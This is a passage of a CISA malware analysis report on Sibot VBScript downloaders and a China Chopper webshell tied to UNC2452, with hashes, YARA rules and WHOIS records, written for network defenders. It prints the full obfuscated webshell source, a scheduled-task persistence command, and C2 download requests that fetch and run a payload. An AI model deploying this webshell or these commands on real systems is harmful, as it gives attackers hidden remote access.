PRIVACY\r\nRegistrant Organization: REDACTED FOR PRIVACY\r\nRegistrant Street: REDACTED FOR PRIVACY\r\nRegistrant City: REDACTED FOR PRIVACY\r\nRegistrant State/Province: Msida\r\nRegistrant Postal Code: REDACTED FOR PRIVACY\r\nRegistrant Country: MT\r\nRegistrant Phone: REDACTED FOR PRIVACY\r\nRegistrant Phone Ext:\r\nRegistrant Fax: REDACTED FOR PRIVACY\r\nRegistrant Fax Ext:\r\nRegistrant Email: https://tieredaccess.com/contact/6e7ea567-7210-4645-a3e9-c430d1ec2730\r\nRegistry Admin ID:\r\nAdmin Name: REDACTED FOR PRIVACY\r\nAdmin Organization: REDACTED FOR PRIVACY\r\nAdmin Street: REDACTED FOR PRIVACY\r\nAdmin City: REDACTED FOR PRIVACY\r\nAdmin State/Province: REDACTED FOR PRIVACY\r\nAdmin Postal Code: REDACTED FOR PRIVACY\r\nAdmin Country: REDACTED FOR PRIVACY\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 34 of 44\n\nAdmin Phone: REDACTED FOR PRIVACY\r\nAdmin Phone Ext:\r\nAdmin Fax: REDACTED FOR PRIVACY\r\nAdmin Fax Ext:\r\nAdmin Email: REDACTED FOR PRIVACY\r\nRegistry Tech ID:\r\nTech Name: REDACTED FOR PRIVACY\r\nTech Organization: REDACTED FOR PRIVACY\r\nTech Street: REDACTED FOR PRIVACY\r\nTech City: REDACTED FOR PRIVACY\r\nTech State/Province: REDACTED FOR PRIVACY\r\nTech Postal Code: REDACTED FOR PRIVACY\r\nTech Country: REDACTED FOR PRIVACY\r\nTech Phone: REDACTED FOR PRIVACY\r\nTech Phone Ext:\r\nTech Fax: REDACTED FOR PRIVACY\r\nTech Fax Ext:\r\nTech Email: REDACTED FOR PRIVACY\r\nName Server: ernest.ns.cloudflare.com\r\nName Server: marjory.ns.cloudflare.com\r\nDNSSEC: unsigned\r\nRegistrar Abuse Contact Email: domainabuse@tucows.com\r\nRegistrar Abuse Contact Phone: +1.4165350123\r\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\r\nRelationships\r\neyetechltd.com Connected_From 88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07\r\nDescription\r\nprnmngrz.vbs (88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07) attempts to connect to this\r\ndomain.\r\na9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f\r\nTags\r\nbotdownloaderloadertrojan\r\nDetails\r\nName Final_vbscript.vbs\r\nSize 12928 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 98c8f536eb39821fa4a98e80bbad81af\r\nSHA1 10b492375c838ce87fc3f2f648de84e3a1443ae6\r\nSHA256 a9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f\r\nSHA512 b894d9b68578d47955665225458ac3727f4d5de5ea6e2e882bb60cc0d4917554d28de85a3489e0f0ec33cbb99b69d2aac3a266e3723baae0\r\nssdeep 192:GHne1RISnxSQc6Hv1t7iaLA8G/5c+Cb5E94RqS6S8Mn4jkaA9c1:GHne157i6G/5c+O5e/S6SmkX9c1\r\nEntropy 4.961650\r\nAntivirus\r\nMicrosoft Security Essentials TrojanDownloader:VBS/Sibot.A!dha\r\nYARA Rules\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 35 of 44\n\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains the de-obfuscated second stage VBScript\r\n(7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb) embedded in the Windows registry\r\n\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\\{Default}.\" The script is obfuscated and when executed, it\r\ncollects the connection GUID associated to the LAN connection and the address of a proxy if configured on the victim's\r\nsystem. It attempts to download a malicious payload from a C2 server. Note: The C2 server was identified as a compromised\r\ndomain and was redacted for privacy.\r\nThe HTTP request header contains the extracted connection GUID in the \"X-XSRF-TOKEN\" field.\r\nDisplayed below is the HTTP request used to download the payload from its C2 server:\r\n--Begin request--\r\nGET /includes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Chromium/78.0.3882.0 Linux\r\nX-XSRF-TOKEN: AACF144C-0770-4FE3-B92B-A4BE71D2F9B9\r\nHost: [Redacted]\r\n--End request--\r\nThe payload was not available for analysis. Analysis indicates that the downloaded payload will be installed and executed\r\nfrom \"c:\\windows\\system32\\drivers\\netioc.sys\" with the command below:\r\n--Begin command--\r\n\"rundll32 netioc.sys,NdfRunDllDuplicateIPDefendingSystem\"    \r\n--End command--\r\nDisplayed below are sample de-obfuscated strings from the script:\r\n--Begin strings--\r\n\"USER-AGENT\"\r\n\"Chromium/78.0.3882.0 Linux\"\r\n\"X-XSRF-TOKEN\"\r\n\"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\\\\\\\.\\\\ROOT\\\\DEFAULT:STDREGPROV\"\r\n\"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\\\\\\\.\\\\ROOT\\\\MICROSOFT\\\\HOMENET\"\r\n\"SOFTWARE\\\\MICROSOFT\\\\WINDOWS\\\\CURRENTVERSION\\\\INTERNET SETTINGS\"\r\n\"PROXYENABLE\"\r\n\"rundll32 mshidkmdfc.sys,Control_DllRun\"\r\n\"c:\\\\windows\\\\system32\\\\drivers\"\r\n\"[Redacted C2]”\r\n\"MSXML2.SERVERXMLHTTP.6.0\"\r\n\"WINHTTP.WINHTTPREQUEST.5.1\"\r\n\"SELECT * FROM HNET_CONNECTION\"\r\n\"GET\"\r\n--End strings--\r\nScreenshots\r\nFigure 6 - The code snippet of the final de-obfuscated vbscript embedded in the Windows registry\r\n\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\\(Default) used to download the malicious payload from its\r\nC2 server.\r\ne9ddf486e5aeac02fc279659b72a1bec97103f413e089d8fabc30175f4cdbf15\r\nTags\r\nbottrojan\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 36 of 44\n\nDetails\r\nName rundll32file_schtaskdaily.vbs\r\nSize 3270 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 97306a881289b3c32085d0901b6d08a7\r\nSHA1 1075639fb7d97ade8bcbe86d38835ac1b71e6237\r\nSHA256 e9ddf486e5aeac02fc279659b72a1bec97103f413e089d8fabc30175f4cdbf15\r\nSHA512 de4e1aaa87b7b38b831a5450c557c3b22a2866b7fb871af3ac7cdf0c208739e01cd86aa9ef7cfd645d95a3993f5f6eefdbe513e8d2af4812a32\r\nssdeep 96:yG/J/WXQGApwj3Fv2tOiFbTLyD1rvdr1dD2PVLFi+:yG/RWXIw1EpTLa1rFr1KLFi+\r\nEntropy 5.622366\r\nAntivirus\r\nMicrosoft Security Essentials Trojan:VBS/Sibot.B!dha\r\nYARA Rules\r\nrule CISA_3P_10327841_04 : SIBOT trojan bot vbscript\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841\"\r\n       Date = \"2021-03-26\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan BOT VBScript\"\r\n       Family = \"SIBOT\"\r\n       Description = \"Detects Scheduled Task persistence for sibot variant AikCetnrll\"\r\n   strings:\r\n       $a1 = \"Actions.Create\" fullword ascii\r\n       $a2 = \"RegistrationInfo\" fullword ascii\r\n       $a3 = \"StartWhenAvailable\" fullword ascii\r\n       $z1 = \"\\\\Microsoft\\\\Windows\\\\CertificateServicesClient\" fullword ascii\r\n       $z2 = \"CreateObject(\\\"Schedule.Service\\\")\" fullword ascii\r\n       $z3 = \"c:\\\\windows\\\\system32\\\\printing_admin_scripts\\\\en-us\\\\prndrvrn.vbs\" fullword ascii\r\n       $z4 = \"AikCetnrll\" fullword ascii\r\n       $z5 = \"This task enrolls a certificate for Attestation Identity Key\" fullword ascii\r\n   condition:\r\n       (3 of ($a*) and 5 of ($z*))\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\n\"Rundll32file_schtaskdaily.vbs\" is a VBScript that creates a scheduled task that executes \"prndrvrn.vbs\"\r\n(CB80A074E5FDE8D297C2C74A0377E612B4030CC756BAF4FFF3CC2452EBC04A9C ) daily. The file \"prndrvrn.vbs\"\r\nis a variant of the Sibot obfuscated VBScript malware. Despite not containing the string “sibot” at all, both\r\n\"rundll32file_schtaskdaily.vbs\" and \"prndrvrn.vbs\" are clearly related to existing Sibot samples as reported on by Microsoft\r\nand Mandiant because the form, function, and obfuscation algorithms of the scripts are identical. The files differ slightly in\r\nspecific details of the scheduled task. \"Rundll32file_schtaskdaily.vbs\" is similar to variant B per previous Microsoft\r\nreporting. The only difference is that the scheduled task points to a file on disk instead of the registry. See analyst notes at\r\nthe end of the report for further details on the variations.\r\nWhen run without admin credentials, the Windows Script Host provides a pop up with a Permission denied error. When run\r\nwith admin credentials, rundllfile_schtaskdaily.vbs script begins running inside of the WScript.exe process.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 37 of 44\n\nThe WScript.exe process creates a scheduled task similar to AikCertEnrollTask, a legitimate task:\r\nTask Name: AikCetnrll\r\nLocation: \\Microsoft\\Windows\\CertificateServicesClient\r\nAlso found on disk in: C:\\Windows\\System32\\Taks\\Microsoft\\Windows\\CertificateServicesClient\\AikCetnrll\r\nDescription: This task enrolls a certificate for an Attestation Identity Key. (Same as AikCertEnrollTask)\r\nCredentials: NT AUTHORITY\\SYSTEM\r\nSecurity Options: Run with highest Privileges; Run whether user is logged on or not; hidden.\r\nEvery day the task is set to run five minutes after initial run time of the script. Ex: Script was run at 1400 the scheduled task\r\nwill run every day at 1405.\r\nThe task executes a rundll32.exe inside a svchost.exe with the arguments:\r\nvbscript:\"\\..\\mshtml,RunHTMLApplication\"+Execute(CreateObject(\"Scripting.FileSystemObject\").OpenTextFile(\"c:\\windows\\system32\\printing_adm\r\nus\\prndrvn.vbs\").ReadAll())(window.close)\r\nThis ultimately runs the prndrvrn.vbs inside “C:\\Windows\\System32\\Printing_Admin_Scripts\\en-us\\” daily, with SYSTEM\r\nlevel privileges.\r\nThis also means that prndrvrn.vbs must be placed inside the “en-us” folder in order for the scheduled task to run properly.\r\nAll variables and Task Scheduler Scripting Objects are obfuscated, but can be determined by referencing the Task Scheduler\r\nScripting Object Microsoft documentation.\r\nStrings of interest:\r\n--Begin strings of interest--\r\nStartWhenAvailable\r\nHidden\r\nDateAdd\r\nStartBoundary\r\nId\r\nEnabled\r\nExecutionTimeLimit = “PT10M”\r\n.Actions.Create(\r\nSchedule.Service\r\n\\Microsoft\\Windows\\CertificateServicesClient\r\nThis task enrolls a certificate for Attestation Identity Key.\r\nDailyTriggerId\r\n.Paths = “rundll32”\r\n.Arguments = “vbscripts:””\\..mshtml,RunHTMLApplication\r\n“”Execute(CreateObject(“”Scripting.FileSystemObject””).OpenTextFile(“”c:\\windows\\system32\\printing_admin_scripts\\en-us\\prndrvrn.vbs””).ReadAll()(window.close)”\r\nRegisterTaskDefinition( “AikCetnrll”\r\nNT AUTHORITY\\SYSTEM\r\n--End strings of interest--\r\nScript needs administrator privileges to run correctly.\r\nThe Task Name is different from previously-reported Sibot samples.\r\n   AikCetnrll\r\nTask Location is different from previously-reported Sibot samples.\r\n   Task Scheduler Library \u003e Microsoft \u003e Windows \u003e CertificateServicesClient\r\n   Or\r\n   C:\\Windows\\System32\\Taks\\Microsoft\\Windows\\CertificateServicesclient\r\nTask Description is different from previously-reported Sibot samples.\r\n   “This task enrolls a certificate for Attestation Identity Key”\r\nScheduled Task Action is different than previously-reported Sibot samples.\r\nTask Trigger is the same and executes five minutes after initial script runtime.\r\nTask Scheduler Operational Event ID – 140 – User “NT AUTHORITY\\SYSTEM” updated Task Scheduler task\r\n“\\Microsoft\\Windows\\CertificateServicesClient\\AikCetnrll”.\r\ncb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c\r\nTags\r\nbotdownloaderloadertrojan\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 38 of 44\n\nDetails\r\nName prndrvrn.vbs\r\nSize 13110 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 a16f6291e6096cfc2cc901050b922b9e\r\nSHA1 1798d1b45d9dd8c5afd4b0a43490233f61864da3\r\nSHA256 cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c\r\nSHA512 260b88a05d9404efce4611a6576e7fddd76b1f92087ccc0c5d8ae757c939e4fc463a35a2f2c19317f64fa9aa4dbbdb24b7adb2fd48d5a91948\r\nssdeep 192:ZTq3D3xkQN1myNlxlmuAp5m2MFSeG7+sh1Nqfu3oLixCeSezjYxAb:ZTFC8oN7KV3oLixHSezkAb\r\nEntropy 4.949764\r\nAntivirus\r\nMicrosoft Security Essentials TrojanDownloader:VBS/Sibot.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\ncb80a074e5... Connected_To sense4baby.fr\r\nDescription\r\nThis file \"prndrvrn.vbs\" is a VBScript that preforms a DNS query to Sense4baby.fr followed by an HTTPS TLS1.2\r\nconnection. It is designed to download a payload, store it as a .sys file, and execute it. Prndrvrn.vbs is a variant of the Sibot\r\nobfuscated VBScript malware. Despite not containing the string “sibot”, both rundll32file_schtaskdaily.vbs and\r\nprndrvrn.vbs are clearly related to existing Sibot samples as reported on by Microsoft and Mandiant because the form,\r\nfunction, and obfuscation algorithms of the scripts are identical. They differ slightly in specific details of the scheduled task.\r\nPrndrvrn.vbs is variant C as described in Microsoft’s reporting.\r\nPrndrvrn.vbs variables and .NET functions are obfuscated. The variable and function names can be de-obfuscated by\r\ncomparing the structures and purposes of the functions to .NET documentation to determine what they represent. The strings\r\nin the program are obfuscated by an encoding function found towards the end of the script.\r\nThe script can run with or without administrator permissions. However, the other scripts used for persistence\r\n(rundll32file_schtasksdaily.vbs) run prndrvrn.vbs with SYSTEM level privileges.\r\nWhen run, prndrvrn.vbs starts inside of Wscript.exe and immediately preforms a DNS query to Sense4baby.fr. After\r\nreceiving a response it begins setting up a TLS1.2 connection. Previous reporting indicates the script tries to pull a .sys file\r\nfrom the URL hxxps[:]//sense4baby.fr/sites/default/files/styles with an HTTPS GET request.\r\nAfter receiving the .sys, prdndrvrn.vbs executes the .sys file. Further analysis is not possible without a copy of the .sys file\r\nthe script is requesting; however, the script appears identical to Microsoft reported Sibot Variant C except for the domain\r\nname, payload name, and payload path. According to Microsoft reporting, the .sys file downloaded by Sibot Variant C is\r\nactually a .dll file with the extension changed to .sys to obfuscate its true nature.\r\nNetwork Artifacts\r\n   (\"rundll32\r\nwudfrdm.sys,ExecuteScheduledSPPCreation\",\"c:\\windows\\system32\\drivers\",\"hxxps[:]//sense4baby.fr/sites/default/files/styles\",\"GET\")\r\nThe intended purpose is to reach out and download file wudfrdm.sys from domain\r\n\"hxxps[:]//sense4baby.fr/sites/default/files/styles\" into folder C:\\windows\\system32\\drivers via an HTTP GET Request\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 39 of 44\n\nObserved in network traffic:\r\n   User Agent: \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/78.0.3904.108 Safari/537.36\"\r\n   GUID String: \"{068B2FE5-EB56-EE50-7A0C-10114EA138E3}\"\r\nsense4baby.fr\r\nTags\r\ncommand-and-control\r\nURLs\r\nsense4baby.fr/sites/default/files/styles\r\nWhois\r\ndomain:     sense4baby.fr\r\nstatus:     ACTIVE\r\nhold:        NO\r\nholder-c:    IANB3-FRNIC\r\nadmin-c:     IANB3-FRNIC\r\ntech-c:     FK3162-FRNIC\r\nzone-c:     NFC1-FRNIC\r\nnsl-id:     NSL5536-FRNIC\r\ndsl-id:     SIGN1631703-FRNIC\r\nregistrar: HOSTING CONCEPTS B.V.\r\nExpiry Date: 2021-07-16T14:47:29Z\r\ncreated:     2019-07-16T14:47:29Z\r\nlast-update: 2020-07-14T13:07:16Z\r\nsource:     FRNIC\r\nns-list:     NSL5536-FRNIC\r\nnserver:     ns1.openprovider.nl\r\nnserver:     ns2.openprovider.be\r\nnserver:     ns3.openprovider.eu\r\nsource:     FRNIC\r\nds-list:     SIGN1631703-FRNIC\r\nkey1-tag:    19594\r\nkey1-algo: 8 [RSASHA256]\r\nkey1-dgst-t: 2 [SHA-256]\r\nkey1-dgst: F144A808B4B16BAF5D9998B8A4153C6C405A967007BD4DACE2C60A4D8A0C36C2\r\nsource:     FRNIC\r\nregistrar: HOSTING CONCEPTS B.V.\r\ntype:        Isp Option 1\r\naddress:     Kipstraat 3c-5c\r\naddress:     3011RR ROTTERDAM\r\ncountry:     NL\r\nphone:     +31 10 448 2299\r\nfax-no:     +31 10 244 0250\r\ne-mail:     sales@openprovider.com\r\nwebsite:     https://www.openprovider.com\r\nanonymous: NO\r\nregistered: 2005-07-01T12:00:00Z\r\nsource:     FRNIC\r\nnic-hdl:     IANB3-FRNIC\r\ntype:        ORGANIZATION\r\ncontact:     ICT Automatisering Nederland B.V.\r\naddress:     ICT Automatisering Nederland B.V.\r\naddress:     Munsterstraat 7\r\naddress:     7418 EV Deventer\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 40 of 44\n\ncountry:     NL\r\nphone:     +31.889082344\r\nregistrar: HOSTING CONCEPTS B.V.\r\nchanged:     2019-01-07T13:52:22Z nic@nic.fr\r\nanonymous: NO\r\nobsoleted: NO\r\neligstatus: ok\r\neligsource: REGISTRAR\r\neligdate:    2021-02-08T15:58:27Z\r\nreachmedia: email\r\nreachstatus: ok\r\nreachsource: REGISTRAR\r\nreachdate: 2021-02-08T15:58:27Z\r\nsource:     FRNIC\r\nnic-hdl:     IANB3-FRNIC\r\ntype:        ORGANIZATION\r\ncontact:     ICT Automatisering Nederland B.V.\r\naddress:     ICT Automatisering Nederland B.V.\r\naddress:     Munsterstraat 7\r\naddress:     7418 EV Deventer\r\ncountry:     NL\r\nphone:     +31.889082344\r\nregistrar: HOSTING CONCEPTS B.V.\r\nchanged:     2019-01-07T13:52:22Z nic@nic.fr\r\nanonymous: NO\r\nobsoleted: NO\r\neligstatus: ok\r\neligsource: REGISTRAR\r\neligdate:    2021-02-08T15:58:27Z\r\nreachmedia: email\r\nreachstatus: ok\r\nreachsource: REGISTRAR\r\nreachdate: 2021-02-08T15:58:27Z\r\nsource:     FRNIC\r\nnic-hdl:     FK3162-FRNIC\r\ntype:        PERSON\r\naddress:     ICT Automatisering Nederland B.V.\r\naddress:     Munsterstraat 7\r\naddress:     7418 EV Deventer\r\ncountry:     NL\r\nphone:     +31.889082344\r\nregistrar: HOSTING CONCEPTS B.V.\r\nchanged:     2019-01-07T13:52:23Z nic@nic.fr\r\nanonymous: NO\r\nobsoleted: NO\r\neligstatus: ok\r\neligsource: REGISTRAR\r\neligdate:    2021-02-08T15:58:28Z\r\nreachmedia: email\r\nreachstatus: ok\r\nreachsource: REGISTRAR\r\nreachdate: 2021-02-08T15:58:28Z\r\nsource:     FRNIC\r\nRelationships\r\nsense4baby.fr Connected_From cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c\r\nDescription\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 41 of 44\n\nprndrvrn.vbs (cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c) attempts to connect to this\r\ndomain.\r\n0d770e0d6ee77ed9d53500688831040b83b53b9de82afa586f20bb1894ee7116\r\nTags\r\nwebshell\r\nDetails\r\nName owafont.aspx\r\nSize 377 bytes\r\nType ASCII text, with very long lines, with no line terminators\r\nMD5 4bb694523bed3645a1671fa7c6ff0dfb\r\nSHA1 ad1e0abbb592edf7102c2dbcc9bf99e6fe742d29\r\nSHA256 0d770e0d6ee77ed9d53500688831040b83b53b9de82afa586f20bb1894ee7116\r\nSHA512 080b8bd560244427b77428e66558d0fd0c5a3feac735d5be5fc028bcab7b5cf7066674b54c81375f5291210d6bfb2afa7eb493a62f33e9a5b5\r\nssdeep 6:aEm70Vqp9skhXxFTrI8LwgHluPkcuG6LNSkbnKRWRt7GTS+3fGlEc39BDz:u70V4XDTrIwwgHlubyNSkhzQ3vGm6/\r\nEntropy 5.292561\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nrule CISA_3P_10327841_03 : CHINACHOPPER webshell\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841\"\r\n       Date = \"2021-03-26\"\r\n       Actor = \"n/a\"\r\n       Category = \"Webshell\"\r\n       Family = \"CHINACHOPPER\"\r\n       Description = \"Detects iteration of China Chopper webshell server-side component\"\r\n   strings:\r\n       $first_bytes = \"\u003c%\"\r\n       $replace = \".Replace(\\\"/*/\\\",\\\"\\\")\" nocase\r\n       $eval = \"eval\" nocase\r\n       $toString = \"tostring\" nocase\r\n       $length = \"length\" nocase\r\n   condition:\r\n       all of them\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is an iteration of the China Chopper webshell server-side component. It has been customized and obfuscated to\r\navoid string-based signature or rule detection. The webshell was observed being placed on a network with an active\r\nSUNSHUTTLE/GoldMax infection. The webshell would provide the actor with an alternative method of accessing the\r\nnetwork if the SUNSHUTTLE/GoldMax infection was remediated.\r\nThe main command executed is:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 42 of 44\n\neval(eval(Request.Item[G0T4oS6pa7FbAl2], unsafe)unsafe)\r\nThe components of this string have been obfuscated in two ways\r\n1.    The strings have been reversed. There is a function in the script that will reverse these upon execution\r\n2.    \"/*/\" strings have been inserted at various points in the strings. This will prevent any signature detection on words such\r\nas \"Request\" or \"unsafe\"\r\nNote: The name “China Chopper” does not positively indicate Chinese attribution to this sample, it’s merely the name of a\r\ncommon web shell which was first used by Chinese APT groups but has since been used by many actors. Attribution of this\r\nsample is not discussed in this report.\r\n--Begin original script--\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\r\n\u003c% function ByzjwD(s){\r\nvar Ewl = s.Length; var Jcw = \"\";\r\nfor(var i = Ewl - 1; i \u003e= 0; i--){\r\nvar Jcw = Jcw + s[i].ToString();\r\n} return Jcw;\r\n}\r\nvar Yhb = ByzjwD(\"]/*/\\\"\" + ByzjwD(\"2lAbF7ap6So4T0G\") + \"\\\"/*/[me/*/t/*/I/*/./*/ts/*/eu/*/qe/*/R/*/\").Replace(\"/*/\",\"\");\r\nvar Vzc = ByzjwD(\"e/*//*/f/*/as/*/nu/*/\").Replace(\"/*/\",\"\");\r\neval(eval(Yhb,Vzc),Vzc);\r\n%\u003e\r\n--End original script--\r\nRelationship Summary\r\n0affab34d9... Contains d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\nd8009ad960... Connected_To 185.225.69.69\r\nd8009ad960... Contained_Within 0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9\r\n185.225.69.69 Connected_From d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\n185.225.69.69 Connected_From fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nf2a8bdf135... Connected_To nikeoutletinc.org\r\nnikeoutletinc.org Connected_From ec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def\r\nnikeoutletinc.org Connected_From f2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2\r\nf28491b367... Contains fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nfa1959dd38... Contained_Within f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c\r\nfa1959dd38... Connected_To 185.225.69.69\r\nb9a2c986b6... Contains 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\n94c58c7fb4... Connected_To reyweb.com\r\n94c58c7fb4... Contained_Within b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\r\nreyweb.com Connected_From 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nec5f07c169... Connected_To nikeoutletinc.org\r\n4e8f24fb50... Connected_To megatoolkit.com\r\n4e8f24fb50... Dropped bc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df\r\nmegatoolkit.com Connected_From 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nbc7a3b3cfa... Dropped_By 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\n88cd1bc85e... Connected_To eyetechltd.com\r\neyetechltd.com Connected_From 88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 43 of 44\n\ncb80a074e5... Connected_To sense4baby.fr\r\nsense4baby.fr Connected_From cb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 44 of 44\n\nPE Sections MD5 Name Raw Size Entropy\nc986ba8e4a156864e2afff2732285838 header 1536 1.243612\n4a26b87fa44a548f2d6d6a3d2cf09fb2 .text 2284544 5.911172\n46e1b5a3734e729d9bdce0a14120c910 .rdata 2400768 5.329403\n952ce42dcbf61c3fac54c2c958e0c551 .data 259072 5.567652\n52887da2b4d17327b2d67732484c11c2 .idata 1536 2.877795\n Page 4 of 44  \n\nMD5 657af7f5c4c96b7699b37a285b3bb95d Name header Raw Size Entropy 512 2.462581\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\n Page 7 of 44",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a"
	],
	"report_names": [
		"ar21-105a"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
